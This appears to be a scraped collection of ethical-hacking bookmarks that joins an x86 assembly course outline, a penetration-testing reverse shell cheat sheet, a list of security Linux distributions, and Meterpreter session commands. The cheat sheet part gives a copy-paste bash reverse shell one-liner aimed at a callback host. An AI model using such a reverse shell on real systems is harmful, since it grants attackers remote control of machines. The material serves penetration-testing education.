background preloader

Ethical Hacking-Your Way To The World Of IT Security

Ethical Hacking-Your Way To The World Of IT Security

The Hacker News - Security in a Serious way ZMap · The Internet Scanner - Vimperator Darknet - The Darkside - Ethical Hacking, Penetration Testing & Computer Security Excited Bit Tools - Vimperator IntroX86 Creator: Xeno Kovah @XenoKovah License: Creative Commons: Attribution, Share-Alike ( Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code. Lab Requirements: Requires a Windows system with Visual C++ Express Edition. Requires a Linux system with gcc and gdb, and the CMU binary bomb installed (use the one below, that link now holds the 64 bit version and this is the 32 bit class). Class Textbook: “Professional Assembly Language” by Richard Blum. Recommended Class Duration: 2-3 days Creator Available to Teach In-Person Classes: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The instructor-led lab work will include:

Penetration Testing and Vulnerability Analysis - Home Cheat Sheet : All Cheat Sheets in one page Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Each of the methods below is aimed to be a one-liner that you can copy/paste. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Here’s a shorter, feature-free version of the perl-reverse-shell: There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7:

BlackArch - ArchWiki - Vimperator Specialty Distributions alphaOS alphaOS is a simple and minimalistic Linux distribution for the x86-64 architecture, built using Linux Live Kit set of scripts developed by Tomas M. Antergos Antergos is an elegant and very customizable system for desktop. ArchAssault ArchAssault, everything you love about Arch Linux but with the security professional and hackers in mind. The ARM line is to help you build the security devices of your dreams with many Open Source devices on the market. ArchBang ArchBang LIVE CD = Arch Linux w/ Openbox (the name is inspired by CrunchBang Linux, which is Debian Linux w/ Openbox) ArchEX ArchEX, based on Arch Linux, is one of the Linux Live DVDs created by C.A. Homepage: Screenshot: DistroWatch Entry: Arch Linux ARM Arch Linux ARM is the new unified effort from PlugApps & ArchMobile. archboot Archboot is designed for installation or rescue operations. BBQLinux BlackArch Linux

Damn Vulnerable Web App Metasploit Metasploit From Wikibooks, open books for an open world Jump to: navigation, search The Metasploit Book This project is an attempt to document the tools and research created by the Metasploit Project. Style Guide Retrieved from " Subjects: Hidden categories: Navigation menu Personal tools Namespaces Variants Views Actions Navigation Community Tools Languages Sister projects Print/export This page was last modified on 27 September 2010, at 19:56.

v3n0m-Scanner/Linux-v3n0m · GitHub - Vimperator Metasploit/MeterpreterClient TODO - meterpreter introduction. Core Commands[edit] ?[edit] We can use ? or help to show a list of commands with brief descriptions. background[edit] Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. meterpreter > background msf exploit(handler) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.50.112:443 -> 192.168.50.100:1495 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > channel[edit] TODO Displays information about active channels close[edit] TODO Closes a channel exit[edit] Returns to the Meterpreter console and closes the active session. meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions. help[edit] interact[edit] TODO Interacts with a channel irb[edit] migrate[edit] quit[edit] read[edit] run[edit] use[edit]

Related: